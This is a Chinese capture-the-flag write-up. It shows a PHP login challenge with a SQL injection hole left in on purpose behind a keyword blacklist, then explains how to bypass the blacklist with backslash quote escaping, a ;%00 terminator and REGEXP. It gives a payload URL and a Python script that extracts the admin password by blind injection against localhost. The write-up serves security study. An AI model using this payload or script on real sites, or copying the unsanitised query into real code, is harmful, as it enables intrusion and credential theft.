红日安全团队的发出的一道题目1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29<?php
include "./config.php";
include "./flag.php";
error_reporting(0);
$black_list = "/admin|guest|limit|by|substr|mid|like|or|char|union|select|greatest|%00|\'|";
$black_list .= "=|_| |in|<|>|-|chal|_|\.|\(\)|#|and|if|database|where|concat|insert|having|sleep/i";
if(preg_match($black_list, $_GET['user'])) exit(":P");
if(preg_match($black_list, $_GET['pwd'])) exit(":P");
$query="select user from users where user='$_GET[user]' and pwd='$_GET[pwd]'";
echo "<h1>query : <strong><b>{$query}</b></strong><br></h1>";
$result = $conn->query($query);
if($result->num_rows > 0){
$row = $result->fetch_assoc();
if($row['user']) echo "<h2>Welcome {$row['user']}</h2>";
}
$result = $conn->query("select pwd from users where user='admin'");
if($result->num_rows > 0){
$row = $result->fetch_assoc();
$admin_pass = $row['pwd'];
}
if(($admin_pass)&&($admin_pass === $_GET['pwd'])){
echo $flag;
}
highlight_file(__FILE__);
?>
审计代码可以看到在登陆处存在注入,但是前面black_list对get的user、pwd都进行了过滤。那我们就要想办法对waf进行让绕过,首先对单引号的过滤导致无法常规闭合原来的查询语句,那么这里可以使用\转义原有语句的单引号,使其与后面的单引号闭合,然后注释掉最后的单引号即可。但是这里对注释符# -进行了过滤,可以使用;%00绕过。再就是对一些sql语句进行了过滤,但是并没有过滤 REGEXP 正则操作符。
payload1
http://127.0.0.1/1.php?user=\&pwd=||pwd/**/regexp/**/"^c";%00
python脚本1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21import requests
str1 = '0123456789abcdefghijklmnopqrstuvwxyz_'
url = 'http://127.0.0.1/1.php?user=\&pwd=||pwd/**/regexp/**/"^{0}";%00'
md5 = ''
while 1:
for i in str1:
x = md5+i
u = url.format(x)
#print u
res = requests.get(u)
if 'Welcome Admin' in res.text:
md5 = md5+i
print md5
break
if i =='_':
break